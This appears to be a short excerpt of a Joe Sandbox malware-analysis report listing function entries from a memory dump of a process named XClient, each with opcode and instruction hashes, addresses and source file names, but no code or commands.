                                                • API String ID:
                                                • Opcode ID: 3af3bc98c8f6c1bc5d1c87d971405866e98ffedc330a1ed810d81ece3c423093
                                                • Instruction ID: 89b71e02d00d21d5d38da09efb7ac9dff447cb8d0e4df039edf68e62f2d07802
                                                • Opcode Fuzzy Hash: 3af3bc98c8f6c1bc5d1c87d971405866e98ffedc330a1ed810d81ece3c423093
                                                • Instruction Fuzzy Hash: BAB092173048091E5094E26CA4D82F886C2CBED5B23140676900DD638ADD242C575200
                                                Function 00007FFEC82A0DB0 Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 269d48c5fe188742865172c5e44448f337a1b5e63c594e34f319fd0f6a5e20a5
                                                • Instruction ID: 2382844c083f0c96eb58071121b9f01c97cf39b1ee708e6fa288bf4c87af87ca
                                                • Opcode Fuzzy Hash: 269d48c5fe188742865172c5e44448f337a1b5e63c594e34f319fd0f6a5e20a5
                                                • Instruction Fuzzy Hash: 16C092013089CA0A9685A62C28F92B88BC2DBEE12534015BBA14BC6387DD04695E0304